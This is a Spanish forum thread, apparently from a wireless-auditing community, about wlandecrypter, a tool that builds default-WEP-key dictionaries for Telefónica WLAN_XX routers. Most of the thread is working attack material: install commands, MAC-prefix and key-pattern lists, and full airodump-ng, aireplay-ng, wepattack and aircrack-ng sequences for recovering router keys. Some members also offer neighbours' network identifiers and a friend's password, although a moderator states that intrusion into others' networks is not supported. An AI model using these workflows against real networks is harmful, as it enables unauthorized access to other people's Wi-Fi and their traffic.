¿Por qué lo sé? han pasado por mis manos durante unos minutos. Por desgracia estaban los jefes delante y no pude anotar mas.
-
la pregunta del milllon es:
siguen un patron?
-
WLANDECRYPTER v1.2
.....................................
Nuevas Macs
00:03:DA:XX:XX:XX
00:1F:9F:XX:XX:XX
E0:91:53:XX:XX:XX
00:18:02:XX:XX:XX
Nuevas Opciones -l, -e y -a
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
USO
uso: wlandecrypter [-l] <bssid> <essid> [output_file opcion]
-l : lista en pantalla todos los routers conocidos.
opcion:
-e : genera diccionario experimental para routers desconocidos.
-a : genera diccionario para todos los routers conocidos y una WLAN_XX.
<essid> = WLAN_??, para crear diccionario con todas las posibilidades.
LEED EL README.TXT
OBSERVACIONES
- Las opciones -e y -a no se ejecutan a la vez, wlandecrypter sólo llevará a cabo la
primera que encuentre en la línea de comandos.
- Opción -e experimental: Ya que en algunos routers las claves siguen el patrón X112233xxxxAB
para por ejemplo un router Xavi con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos
Comtrend, Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no
estén aun en la lista.
- Opción -a: Genera las claves de un WLAN_XX para todos los routers conocidos sin tener en cuenta
la bssid introducida. Por ejemplo puede servir para un router no conocido, distinto a los entregados
por el operador, pero en el que se haya mantenido la configuración del original.
- Un diccionario con la opción -a y wlan_?? ocupará unos de 4,2 GB de disco duro, ¿realmente
necesitas eso Y PUEDES MANEJARLO?.
- Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
EJEMPLOS
- Ejemplo1: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba -e
Genera Diccionario 'prueba'con C001122xxxxAA, X001122xxxxAA, Z001122xxxxAA, T001122xxxxAA y H001122xxxxAA
- Ejemplo2: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba2 -a
Genera el diccionario 'prueba2' para cada BSSID, es decir, para cada router conocido y WLAN_AA,
no importa que pongamos como <bssid> no se usará. El diccionario ocupará 19,2 MB en disco duro.
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
Descarga
Linux -> http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz
Mac OSX (intel) -> http://www.box.net/shared/r360i09hdl
windows -> http://www.wifiway.org/archivos/wlandecrypter-1.2.zip
Todas las versiones linux -> http://code.google.com/p/wlandecrypter/downloads/list
Salud!
-
Gracias compañero Niroz&Me|on .
-
Hola a todos.
ya he conseguido hacer funcionar el wlandecrypter.
he llegado a la conclusion (que me corrijan los expertos sino) que el aircrack no es capaz de aplicar el diccionario a archivos .ivs, necesita archivos .cap
desde que hago las pruebas con los .cap va perfectamente.
De que empresa es una red qe se llama WLANxxxxxx? 6 digitos y sin el guion bajo.
la mac es 00:22:2D......
un saludo a todos
-
Hola a todos.
ya he conseguido hacer funcionar el wlandecrypter.
he llegado a la conclusion (que me corrijan los expertos sino) que el aircrack no es capaz de aplicar el diccionario a archivos .ivs, necesita archivos .cap
desde que hago las pruebas con los .cap va perfectamente.
De que empresa es una red qe se llama WLANxxxxxx? 6 digitos y sin el guion bajo.
la mac es 00:22:2D......
un saludo a todos
es de Yacom hay post buscando por Wlanxxxxxx ;)
confirmado. telefonica esta instalando dos modelos de router con WPA-psk activado.
la implementacion va a ser bastante rapida con el comtrend 5635 y un zyxel.
El Comtrend usa wpa de 20 digitos alfanumericos en minusculas
El Zyxel usa wpa de 20 digitos alfanumericos en MAYUSCULAS
El SSID es del estilo: wlan_xxxx
Tambien podria darse el caso de un modelo facilitado por Observa telecom con un punto en posición aleatoria. Pero este ultimo no lo he podido confirmar.
¿Por qué lo sé? han pasado por mis manos durante unos minutos. Por desgracia estaban los jefes delante y no pude anotar mas.
jejej que riesgo ;) yo en mi empresa tambien tienen el nuevo Router pero lo peor es que lo busque con mi movil y...!!! :( sorpresa se llama wlan_xxxx creo pero lo tienen guardado y no puedo acceder a el :P para ver el patron :-X pues parece que Timofonik se a puesto las pilas :-[
-
00:1D:20:XX:1E:2D WLAN_1E2A WPA
Buscando patron de claves por defecto de las nuevas WLAN_XXXX con WPA
-
Hola compañeros, no se puede instalar el nuevo wlandecrypter 1.2 con el método que utilizaba así? yo antes hacía esto para instalar la nueva versión en mi usb live
wifipacket update
wifipacket list
wifipacket install wlandecrypter
agradezco mucho vuestra ayuda!!!
Un saludo ;)
-
Hola.
Mira que no ver antes esto, ando haciendo el tonto y no veo lo importante, ahora mismo entre la nieve y demás impedimentos la cosa la tengo algo complicada, pero en cuanto se quite la nieve, monto el WifiMovil y le doy un repaso a los pueblos circundantes, si solo os hace falta el BSSID y el ESSID, creo que podría dar bastantes datos, si los hubiera, que para algo se invento el WifiMovil, haberme avisado de esto, y ya teníais las que quisierais y mas, juas, anda que!
Salu2 y suerte
-
windows -> http://www.wifiway.org/archivos/wlandecrypter-1.2.zip
Da error:
La carpeta comprimida (en zip) no es válida o está dañada
Saludos al foro y Feliz Año ;)
-
windows -> http://www.wifiway.org/archivos/wlandecrypter-1.2.zip
Da error:
La carpeta comprimida (en zip) no es válida o está dañada
Saludos al foro y Feliz Año ;)
Lo acabo de descargar y descomprimir y todo esta OK. Quizá tu descarga esta corrupta y no se haya recibido bien el fichero. Byez.
-
(http://bandaancha.eu/images/man/pages/estudio-wifi/configuracion-wifi-router-telefonica.gif)
-
nueva mac
WLAN_XX
00:24:17:XX:XX:XX
-
Buenas!! ¿Cómo va todo por aquí? Veo que el proyecto ha avanzado mucho!!
Quería daros las gracias a todos por mantener el proyecto vivo todo este tiempo que he estado offline. ;)
Después de volver a abrir rusoblanco, he estado hablando con Niroz&Me|on y hemos decidido unir fuerzas para continuar el desarrollo. De momento he retomado el proyecto en googlecode http://code.google.com/p/wlandecrypter/downloads/list (http://code.google.com/p/wlandecrypter/downloads/list) y he subido todas (o casi todas) las modificaciones que se han hecho en todo este tiempo.
De momento tengo un par de ideas para mejorar el programa:
- Poner el listado de routers/claves en un fichero a parte
- Script (o funcionalidad del programa) para actualizar la lista de routers/claves desde el repositorio
- Capacidad para leer ficheros .cap y generar diccionarios automáticamente en función de los IVs encontrados.
- Integrar código de wepattack
Aunque viendo el código me temo que lo mejor será volver a escribirlo entero... intentaré, por el bien de los ojos de todos los programadores, no hacerlo borracho esta vez :D
Un saludo!
P.D.: Si alguien conoce a un tal glards (dueño del proyecto en googlecode) que me pase su email por privado para poder ponerme en contacto con el.
-
Bienvenido nilp0inter!! :)
-
Aunque viendo el código me temo que lo mejor será volver a escribirlo entero... intentaré, por el bien de los ojos de todos los programadores, no hacerlo borracho esta vez
fijo que programas borracho mejor que yo ;D ;D
Bienvenido!!
-
(http://freesoftwareando.com/wp-content/uploads/2009/12/wlandecrypter.jpg)
http://freesoftwareando.com/4809/wlandecrypter-11-amigaos4x/
p.d.me escribieron el otro dia para contarme que habian portado el code
niroz o nilp0inter os paso mail?
-
http://freesoftwareando.com/4809/wlandecrypter-11-amigaos4x/
p.d.me escribieron el otro dia para contarme que habian portado el code
niroz o nilp0inter os paso mail?
Lo he mirado y es el wlandecrypter-1.1 sólo con cambios en la ayuda que muestra y que lista los router conocidos en la v1.1. Es decir la v1.1 con básicamente estas líneas añadidas
if(argv[1])
{
if(argv[1][0] =='-' && argv[1][1] =='v' )
{
printf("version %i.%i\n", VERSION, SUBVERSION);
return 0;
}
if(argv[1][0] =='-' && argv[1][1] =='h' )
{
printf("\nwlandecrypter [MAC ROUTER] [ESSID]\n\n-h\t Muestra la ayuda\n");
printf("-v\t Version\n");
printf("-l\t Lista de MAC soportadas\n\n");
return 0;
}
if(argv[1][0] =='-' && argv[1][1] =='l' )
{
printf("00:60:B3:XX:XX:XX - Z-com\n");
printf("00:01:38:XX:XX:XX - Xavi 7768r\n");
.
.
.
printf("00:23:F8:XX:XX:XX - Zyxel_P660HW-D1\n");
printf("00:01:36:XX:XX:XX - Xavi_7768r_2009\n");
return 0;
}
}
-
Curioso, wlandecrypter para Amiga, jejeje.
-
mmm...por cierto como se instala en wifiway la v1.2 ??...porque como se hacia anteriormente no vale... :S:S:S un saludo!!!
-
Para las redes wlanxxxxxx (con clave wep por lo que he podido ver) se ha sacado ya algun patron o generador?? Creo que eran de ya.com me ha parecido leer por algun post.
Saludos
-
Buenas , quiero agradecer 1º que nada por los grandes aportes, como ven soy nuevo , tanto en el foro como en el mundo de los ruter xD.
Tengo un problema me han regalado un cd live llamado MUNDO DAMIAN P-wak Dogma y tiene el Wlandecrypter 0.7 por defecto y no me leé los nuevos diccionarios como el del 1.2 q supongo q tendrá lo q busco yo.
me pueden explicar POR FAVOR !! ¿que tengo q hacer para desde el cd live que uso para instalar el wlandecrypter 1.2? es que no manejo muy bien ese systema operativo y no veo manuales por ningún lado .
¿Alguien que me ayude por favor?
-
Nose que sistema es ese, pero el wlandecrypter no es para leer diccionarios, sino todo lo contrario, generarlos.
Bajate el wifiway 1.0 que esta diseñada para auditorias.
Saludos
-
Para las redes wlanxxxxxx (con clave wep por lo que he podido ver) se ha sacado ya algun patron o generador?? Creo que eran de ya.com me ha parecido leer por algun post.
Saludos
De momento no parece haber nada claro para generar un patrón. Por si no lo has visto ya ahí van un par de enlaces:
https://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlanxxxxxx
http://foro.elhacker.net/wireless_en_linux/wlanxxxxxx-t208204.0.html
Byez.
-
uno puede construir un diccionario como los generados con wlandecrypter con wlanXX , si tiene los patrones de las contraseñas como ABC1234567, pero de forma manual
-
Wenas ....Perdonen mi ignorancia...Soy nuevo, tengo el wifiway 1.0 i e conseguido sacar redes Wlan_XX pero Ahora tengo una k se me resiste la Bssid es E0:91: etc i nose como añadir este wlandecripter....Ay algun Live CD wifislax o wifiway con esta version de wlandecripter.... o como poner este ..... Agradesco vuestra ayuda.....
Gracias de antemano :)
-
No se da soporte a intrusiones en redes ajenas
-
Ok....Perdona por no explicarme bien...... El ruter k me comprado es nuevo, el k tenia era viejo, i este es la mac E0:91:....... pero me pierdo en lo del wlandecripter este nuevo, si me podrias ayudar.... pork no entiendo muxo en linux, descargo ese estoy en windows ahora, tengo el live Cd wifisway 1.0 ......Si me podriais echar una mano, para provar con el nuevo ruter ¡¡¡
-
Ok....Perdona por no explicarme bien...... El ruter k me comprado es nuevo, el k tenia era viejo, i este es la mac E0:91:....... pero me pierdo en lo del wlandecripter este nuevo, si me podrias ayudar.... pork no entiendo muxo en linux, descargo ese estoy en windows ahora, tengo el live Cd wifisway 1.0 ......Si me podriais echar una mano, para provar con el nuevo ruter ¡¡¡
alloraralaiglesia!!
-
nose si ago bien la instalacion del wlandecrypter-1.1...
el 1.2 no me deja me da un fallo ???
.................
P.D.ESTA + QUE EXPLICADO!!
-
peña , que parte no has comprendido ¿?
No se da soporte a intrusiones en redes ajenas
Saludos
-
para instalarlo tengo de estar conectado en internet, para k lo descarge i se instale solo cuando pongo el codigo??
El wlandecrypter-1.2.tar.gz no me funciona...... Si eso luego subo un Screen del fallo ....
muxas gracias
EDITADO
ya pude con mi ruter, i pude instalar bien el wlandecrypter, me dava error pork lo descarge desde windows, pero con linux pude descargarlo e instalarlo muxas gracias, Soys los mejores >:(
-
¿Cómo va la cosa de las WPA? Hoy en casa de mi novia mirando con el portatil me di cuenta que el vecino se ha puesto internet, y se ha apañado una de estas de telefónica parece ser, si quereis el BSSID y el ESSID os lo doy por mp o lo posteo aqui mismo. Lo decía por si os sirve de aporte.
PD: Mi novia tiene línea de internet XD
-
hola a todos!!!!
mira tengo un problema tengo el WIFIWAY 1.0 final en un cd autoejecutable. con el wlandescrypter 0.7, lo q pasa q no reconoce la mac E0:91:53:........ x lo q leyendo x el foro m enterao que hay q actualizarlo a la version 1.2 pero no se como hacerlo.
ya he probado a ir a MENU SISTERMA WIFIPACKET , pero alli no m deja escribir NADA para que pueda bajarme las ACTUALIZACIONES,
si alguien m pudiera ayudar.
muchas gracias!!!!
-
Ummmm..... Yo tambien tenia ese problema....... tendras de conectarte a internet i desde linux descargar la actualizacion....e instalarlo una vez descargado aguardate ese pakete en un lapiz para no volver a descargarlo mas..... Pero siempre k ejecutes wifiway desde un Live CD tendras de instalarlo siempre es mas o menos lo mismo......
-
hola a todos!!!!
mira tengo un problema tengo el WIFIWAY 1.0 final en un cd autoejecutable. con el wlandescrypter 0.7, lo q pasa q no reconoce la mac E0:91:53:........ x lo q leyendo x el foro m enterao que hay q actualizarlo a la version 1.2 pero no se como hacerlo.
ya he probado a ir a MENU SISTERMA WIFIPACKET , pero alli no m deja escribir NADA para que pueda bajarme las ACTUALIZACIONES,
si alguien m pudiera ayudar.
muchas gracias!!!!
Como bien dice peña, como lo usas desde (Live cd) un cd sin tener instalado nada en disco duro, tendrás que instalar wladecrypter-1.2 cada vez que cargues wifiway, ya que al reiniciar se pierde cualquier modificación hecha. En principio con estar dentro de la carpeta donde esté la v1.2 descomprimida sólo hay que teclear:
make install
Para más info sobre wifiway o su instalación:
https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/
https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/
byez.
-
Hola amigos!!!
Bueno hoy he tenido una experiencia nueva con el wlandecrypter....
es que me a llegado un router de timofonica de bssid 00:1A:2B:XX:XX:XX pero con clave C64680C0461E6
y el wlandecrypter lo reconoce como patron C00........E6
la verdad es la primeira vez que veo este router con esete patron de clave...
¿seria un patron nuevo usado por timofonica?
-
Hola amigos!!!
Bueno hoy he tenido una experiencia nueva con el wlandecrypter....
es que me a llegado un router de timofonica de bssid 00:1A:2B:XX:XX:XX pero con clave C64680C0461E6
y el wlandecrypter lo reconoce como patron C00........E6
la verdad es la primeira vez que veo este router con esete patron de clave...
¿seria un patron nuevo usado por timofonica?
Es posible ya que sigue la forma de los anteriores, debo suponer que con WLAN_E6, verdad?
Si es así será añadida a wlandecrypter y a ti como su descubridor : )
Saludos.
-
hola me han cambiado el router los de timofonica ,ya qe el antiguo se ha jodido y bueno estoy probando con mi wifiway 1.0 final a descubrir su contraseña ,pero me he encontrado qe este tiene tambien lo qe le pasa a un compañero de aqi qe tiene una mac qe nunca he visto E0:92:XX:XX. y la cosa es qe ya estoy aburrido de capturar datas he yegado a los 250.000 y nada cuando el otro ruter qe tenia MAC 00:01:38 no tardaba mas de 5 minutos ,he visto qe hay qe actualizar el wlandecrypter a la version 1.2 ,lo unico qe tendria qe hacer es conectarme a internet desde wifiway y poner los sigientes comandos wifipacket update
Wifipacket list
wifipacket install wlandecrypter
hola denuevo no se si lo he hecho bien me conectado a internet con wifiway ,he abierto una consola y he puesto wifipacket install wlandecrypter y el resultado es esto
Encontrado
Descargado
Chmod
Comprobado
Descomprimiendo y copiando
TIOCGWINZ ioctl failed, defaulting to 80 columns
[===================================================================|] 2/2 100%Paquete instal ado satisfactoriamente
Borrados temporales
¿ esta bien instalado ?
Post Merge: [time]Sat Mar 6 13:23:38 2010[/time]
hola denuevo me he descargado el archivo wlandecrypter-1.2.tar.gz y lo he guardado en la carpeta root/ ,despues abrir una consola y escribi lo sigiente : wget -c http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz
tar zxvf wlandecrypter-1.2.tar.gz
cd wlandecrypter-1.2/
make clean && make && make install , pero la cosa es qe cuando abro una consola nueva y pongo wlandecrypter me sige apareceiendo la version 1.1 ¿Qe he hecho mal ,alguna ayuda por favor? ,por cierto yo hago esto con el usb de wifiway
-
hola me han cambiado el router los de timofonica ,ya qe el antiguo se ha jodido y bueno estoy probando con mi wifiway 1.0 final a descubrir su contraseña ,pero me he encontrado qe este tiene tambien lo qe le pasa a un compañero de aqi qe tiene una mac qe nunca he visto E0:92:XX:XX. y la cosa es qe ya estoy aburrido de capturar datas he yegado a los 250.000 y nada cuando el otro ruter qe tenia MAC 00:01:38 no tardaba mas de 5 minutos ,he visto qe hay qe actualizar el wlandecrypter a la version 1.2 ,lo unico qe tendria qe hacer es conectarme a internet desde wifiway y poner los sigientes comandos wifipacket update
Wifipacket list
wifipacket install wlandecrypter
hola denuevo no se si lo he hecho bien me conectado a internet con wifiway ,he abierto una consola y he puesto wifipacket install wlandecrypter y el resultado es esto
Encontrado
Descargado
Chmod
Comprobado
Descomprimiendo y copiando
TIOCGWINZ ioctl failed, defaulting to 80 columns
[===================================================================|] 2/2 100%Paquete instal ado satisfactoriamente
Borrados temporales
¿ esta bien instalado ?
Si querías decir la mac E0:91:53:XX:XX:XX, esta es reconocida desde la v1.2 de wlandecrypter.
Para instalar la v1.2 descárgala del primer post de este tema, descomprime y dentro de la carpeta (en consola) donde esté descomprimida teclea: make install
Esto ya se comenta también en pocos post anteriores.
-
hola ya lo tengo instalado ahora va perfecto actualizado a la V1.2 ,pero ahora estoy un poco liado he mirado mucho por aqi y diferentes ataques ,pero no me aclaro , supuestamente primero airodump-ng -w casa -c 6 wlan0--------- aireplay-ng -1 0 -e WLAN_67 -a mac mi router -h mac alfa wlan0------------aireplay-ng -3 -x600 -b mac mi router -h mac alfa wlan0 y cuando tenga los datas-------- wlandecrypter E0:91:53:XX:XX:XX WLAN_67 | wepattack -f casa.cap ¿esta bien? perdonarme pero como nunca antes habia hecho esto no se,pero estoy en ello.
-
Es un poco tarde y estoy aturdido pero, en el segundo comando (ataque A1) deberías poner algo diferente a 0 p. ej. 30.
aireplay-ng -1 0 -e WLAN_67 -a mac mi router -h mac alfa wlan0
Prueba así: aireplay-ng -1 30 -o 1 -e (WLAN_67) -a (MAC_de_tu_router) -h (MAC_de_Alfa) wlan0.
Saludos.
-
hola gracias por tu ayuda ,pero ese comando esta bien ya lo sabia yo ,tambien puedo poner aireplay-ng -1 6000 -o 1 -q 10 -e wlan_xx -a mac mi router -h mac alfa ,pero yo no tengo problemas yo me asocio perfectamente ,mi duda es si cuando lanzo el ataque 3 cuando obtengo los datas esta bien el sigiente comando ya qe yo no tengo ningun diccionario , wlandecrypter E0:91:53:XX:XX:XX WLAN_67 | wepattack -f casa.cap ¿esta bien? .
-
Buenas
Al comando le falta el 01 o *, lo demás está bien.
wlandecrypter E0:91:53:XX:XX:XX WLAN_67 | wepattack -f casa-01.cap
wlandecrypter E0:91:53:XX:XX:XX WLAN_67 | wepattack -f casa*.cap
Ya sabes, cada vez que lanzas el airodump con el -w casa, te crea un archivo para guardar los data, el primero será el 01, si lo vuelves a lanzar 02...
Un saludo
-
hola muchas gracias mañana lo probare a ver qe tal ,qe ya es tarde y mañana hay qe madrugar .y ya os ire comentando.
Post Merge: 08-03-2010, 20:00 (Lunes)
hola va perfecto no ha tardado ni 1 minuto en darme la clave de mi router ,con solo 1 data y vuala ,muchas gracias a todos.
-
hola muchas gracias mañana lo probare a ver qe tal ,qe ya es tarde y mañana hay qe madrugar .y ya os ire comentando.
Post Merge: 08-03-2010, 20:00 (Lunes)
hola va perfecto no ha tardado ni 1 minuto en darme la clave de mi router ,con solo 1 data y vuala ,muchas gracias a todos.
Con solo 1 data?'
Pense que eran necesarios 4 como minimo... ???
-
Buenas
sagahades26 me alegro que te funcionase ;).
ironjon , wlandecrypter 4 datas, wlandecrypter + wepattack 1 data.
Saludos
-
Me alegro de volver a verte nuevamente nilp0inter, espero que todo vaya bien y que te cases pronto ^-^
En el simo nos vemos este año ;D
-
hola muchas gracias manel y a todos los qe haceis este grandisimo trabajo,qe os pegais un curro increible.
-
nueva mac 00:19:5B:XX:XX:XX
-
Perdonad mi ignorancia, pero leo para aprender. Me descarge la actualizacion a 1.2 y posteriormente ejecuto el livecd con el wifiway. a partir de aqui no me aclaro, como instalo esta actualizacion, meto el wlandecrypter 1.2 en un penadrivers y luego lo ejectuo con el wifiay ya activo?, que comando uso?, ahi me perdi un poco, a ver si alguien me da una sencilla leccion. Gracis por anticipado
-
hola muy bueno el nuevo wlandecypter da mucho juego >:(
josemanuellop para instalarlo tienes que descomprimir el archivo tar. y leerte el readme lo malo es que en un live cd tendras que instalarlo cada vez que arranques porque no te guarda los cambios
un saludo
-
bueno lei el readme ese, sigue siendo mu lioso para mi, jajaj., penseque seria mucho mas facil, meterloen una memoria usb y ejecutarlo de alguna manera,, Mucha inormacion pa que solo sabe lo sabio, muchos comandos, jaja. Grcias
-
siempre puedes hacer tu usb persitente para poder instalar aplicaciones no es muy dificil y tienes informacion en el foro
-
se puede instlar en usb con el wifiway el wlandecrypter 1.2, o tamibne eso va conel wifiway ya ejecutado?
-
Lei todo lo que tenia que leer y sigo sin enterarme, a ver. Me descargue el wlandescrypter 1.2, meto en un pendrivers el archivo descomprimido, pero luego como se ejecuta este archivo desde wifiway?, eso no me quedo claro.. Un saludo
-
Lei todo lo que tenia que leer y sigo sin enterarme, a ver. Me descargue el wlandescrypter 1.2, meto en un pendrivers el archivo descomprimido, pero luego como se ejecuta este archivo desde wifiway?, eso no me quedo claro.. Un saludo
Si, desde wifiway.
Cuando estés en el escritorio de wifiway copia al mismo la carpeta con wlandecrypter descomprimido, ese que dices tienes en el pendrive.
Abre un terminal, es decir, consola (konsola), y entra a la carpeta esa donde está wlandecrypter. Allí teclea: make install
Si todo va bien, que debería, ya está instalado. Ahora teclea wlandecrypter.
-
Buenas,,,
Soy un aficionado al wifiway y voy probando cada actualizacion que va saliendo, todas me han funcionando correctamente, pero hace como un mes, telefonica me cambio el router, y estuve jugando un poco con wlandecrypter version 1.3, mi sorpresa es que no encuentra bssid , he estado leyendo mil foros de seguridad wireles y ninguno habla de este tipo de router, la mac empieza por 40:4A:03 ETC , todavia es muy temprano para tener un wlandecrypter para este tipo de router, o es un router que tenian por ahi y me lo han acoplado. De todas maneras con el airoscript no hay problema.
Ahi os dejo mi pequeño aporte.
-
Buenas,,,
Soy un aficionado al wifiway y voy probando cada actualizacion que va saliendo, todas me han funcionando correctamente, pero hace como un mes, telefonica me cambio el router, y estuve jugando un poco con wlandecrypter version 1.3, mi sorpresa es que no encuentra bssid , he estado leyendo mil foros de seguridad wireles y ninguno habla de este tipo de router, la mac empieza por 40:4A:03 ETC , todavia es muy temprano para tener un wlandecrypter para este tipo de router, o es un router que tenian por ahi y me lo han acoplado. De todas maneras con el airoscript no hay problema.
Ahi os dejo mi pequeño aporte.
La clave por defecto del router es WEP o WPA???
-
hola...
Es Wep ademas es muy parecida a las normales, en este tipo de wlan.
Si quieres te paso la informacion que necesites.
-
Pensaba que eras de las nuevas WLAN_XXXX ???
De todas maneras la info de tu red puede ser interesante al no estar esa MAC incluida en wlandecrypter
-
nueva MAC--------------> 00:22:75:XX:XX:XX
P.D.telefonica sigue errequeerre con WEP
-
Buenas, como vereis soy nuevo aqui, aunque llevo leyendo algo mas de tiempo en este foro y en el hermano, y ya que estoy voy a ver si puedo ayudar con algo >:D
Si os sirve de ayuda para el patron de las WLAN_XXXX puedo proporcionar el ESSID y la MAC de una que acabo de ver han instalado por aqui cerca mio, mandadme un mp o decidme a quien se la puedo pasar por mp tambien y en cuanto pueda ya la tendriais. Y también otra mas de un amigo que ademas me daria la contraseña, supongo que ayudará un poco mas.
Saludosss ;)
-
a mi por IM
-
Yo acabo de ver uno nuevo de un colega y lo he probado y mis resultados son estos:
Mac 40:4A:03:xx:xx:xx
Cifrado wep
essid WLAN_ZZ (Telefonica)
Clave Z404A03xxxxZZ
Tras probar con mi colega los resultados fueron estos:
Asociacion correcta.
Ataque chop-chop no posible (da error siempre)
Ataque Fragmentacion satisfactorio
Espero que os sirva de algo 8)
-
hecho! ;)
niroz se encargara de ello!
-
Yo acabo de ver uno nuevo de un colega y lo he probado y mis resultados son estos:
Mac 40:4A:03:xx:xx:xx
Cifrado wep
essid WLAN_ZZ (Telefonica)
Clave Z404A03xxxxZZ
Tras probar con mi colega los resultados fueron estos:
Asociacion correcta.
Ataque chop-chop no posible (da error siempre)
Ataque Fragmentacion satisfactorio
Espero que os sirva de algo 8)
Puedes indicar también la marca y modelo del router?
-
Vais a actualizar el wlandecripter con las nuevas Macs??? En el Wlanreaver 0,3 ya estan actualizadas???
saludos.
alfon6
-
Si claro se actualizará un poco más adelante con nuevas mac.
Wlanreaver 0.3 tiene las mismas mac incluidas en wlandecrypter v1.2
-
Oido cocina..... A la Espera estoy...
Saludos.
Alfon6
-
Hola a todos, soy nuevo en el foro, y me gustaria que me prestaseis vuestra ayuda.
Mis dudas y preguntas son las siguientes:
-. Tengo el live cd del wifiway1.0, y me gustaria aprender a utilizar el Wlandecripter, no se ni por donde empezar a usarlo, es decir, como se instala, que procesos seguir para utilizarlo correctamente, que otros programas necesito para usarlo conjuntamente con el Wlandecripter... si alguien puede decirme donde conseguir un tutorial para ir paso a paso o me ayuda personalmente se lo agradeceria muchisimo.
Muchas gracias de antemano y un saludo.
-
¿no se te ha ocurrido mirar el primer post de este tema?
-
drvalium, si que me leido el primer post, pero al andar perdido me he decidido hacer la consulta de antes, me podrías aclarar un poco como empezar?.
Un saludo y gracias
-
es que no se que quieres que te aclare ???
se instala así
- wget -c http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz
tar zxvf wlandecrypter-1.2.tar.gz
cd wlandecrypter-1.2/
make
make install
y se usa así:
USO
uso: wlandecrypter [-l] <bssid> <essid> [output_file opcion]
-l : lista en pantalla todos los routers conocidos.
opcion:
-e : genera diccionario experimental para routers desconocidos.
-a : genera diccionario para todos los routers conocidos y una WLAN_XX.
<essid> = WLAN_??, para crear diccionario con todas las posibilidades.
LEED EL README.TXT
OBSERVACIONES
- Las opciones -e y -a no se ejecutan a la vez, wlandecrypter sólo llevará a cabo la
primera que encuentre en la línea de comandos.
- Opción -e experimental: Ya que algunos routers las claves siguen el patrón X112233xxxxAB
para por ejemplo un router Xavi con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos
Comtrend, Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no
estén aun en la lista.
- Opción -a: Genera las claves de un WLAN_XX para todos los routers conocidos sin tener en cuenta
la bssid introducida. Por ejemplo puede servir para un router no conocido, distinto a los entregados
por el operador, pero en el que se haya mantenido la configuración del original.
- Un diccionario con la opción -a y wlan_?? ocupará unos de 4,2 GB de disco duro, ¿realmente
necesitas eso Y PUEDES MANEJARLO?.
- Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
EJEMPLOS
- Ejemplo1: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba -e
Genera Diccionario 'prueba'con C001122xxxxAA, X001122xxxxAA, Z001122xxxxAA, T001122xxxxAA y H001122xxxxAA
- Ejemplo2: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba2 -a
Genera el diccionario 'prueba2' para cada BSSID, es decir, para cada router conocido y WLAN_AA,
no importa que pongamos como <bssid> no se usará. El diccionario ocupará 19,2 MB en disco duro.
lo pone en el primer post ???
si no entiendes eso necesitas leerte esto otro
https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/mi-primera-auditor237a/
saludos
-
Hola de nuevo, mira, tengo un livecd de linux, con el wifiway, si quiero instalar el wlandecrypter, tengo que instalarme linux en una particion?.
En caso de que asi sea, para instalar el wlandecrypter es esto lo que tengo que poner:?
tar zxvf wlandecrypter-1.2.tar.gz
cd wlandecrypter-1.2/
make
make install.
Y una vez que quiera usar el programa tengo que poner lo siguiente:?
wlandecrypter 00:11:22:33:44:55 wlan_aa prueba2 -a
Donde 00:11:22:33:44:55 es mi MAC, wlan_aa es el nombre de mi red, lo que no se que es prueba...
Una vez echo esto, que mas hay que hacer? Hay que asociarlo con algún otro programa?
Un saludo
-
Y una vez que quiera usar el programa tengo que poner lo siguiente:?
wlandecrypter 00:11:22:33:44:55 wlan_aa prueba2 -a
Donde 00:11:22:33:44:55 es mi MAC, wlan_aa es el nombre de mi red, lo que no se que es prueba...
Una vez echo esto, que mas hay que hacer? Hay que asociarlo con algún otro programa?
wlandecrypter xx:xx:xx:xx:xx:xx wlan_XX fichero_donde_guardo_las_claves
aircrack-ng captura.cap -w fichero_donde_guardo_las_claves
ejemplo: wlandecrypter 00:1A:2B:XX:XX:XX WLAN_5D diccionario00
aircrack-ng captura.cap -w diccionario00
http://www.hispanew.org/html/?p=165
-
Hola, ya me voy enterando mas o menos de como funciona el tema.
Corregidme en algun paso si me equivoco por favor:
1º. Meto en un USB el wlandecrypter.
2º. Inicio linux con el livecd del wifiway.
3º. Instalo wlandecrypter tal como se nos indicaba en la 1º pagina.
4º. Una vez instalado, ejecuto el siguiente comando: wlandecrypter 00:1A:2B:XX:XX:XX WLAN_5D diccionario00, este comando lo ejecuto tal cual? es decir, la MAC la cambio por la mia, y el nombre de la wlan_5d tambien, pero lo de diccionario00 eso lo dejo tal cual?
5º. Ahora ejecuto este comando: aircrack-ng captura.cap -w diccionario00, y se supone que ya me debería mostrar la contraseña?.
Si veis que en algun paso me equivoco o me falta algo por hacer, podéis hacer un copy/paste de mis pasos e insertar en su lugar el que falte?.
Os agradezco muchisimo vuestra ayuda, un saludo.
-
Hola, ya me voy enterando mas o menos de como funciona el tema.
Corregidme en algun paso si me equivoco por favor:
1º. Meto en un USB el wlandecrypter.
2º. Inicio linux con el livecd del wifiway.
3º. Instalo wlandecrypter tal como se nos indicaba en la 1º pagina.
4º. Una vez instalado, ejecuto el siguiente comando: wlandecrypter 00:1A:2B:XX:XX:XX WLAN_5D diccionario00, este comando lo ejecuto tal cual? es decir, la MAC la cambio por la mia, y el nombre de la wlan_5d tambien, pero lo de diccionario00 eso lo dejo tal cual?
5º. Ahora ejecuto este comando: aircrack-ng captura.cap -w diccionario00, y se supone que ya me debería mostrar la contraseña?.
Si veis que en algun paso me equivoco o me falta algo por hacer, podéis hacer un copy/paste de mis pasos e insertar en su lugar el que falte?.
Os agradezco muchisimo vuestra ayuda, un saludo.
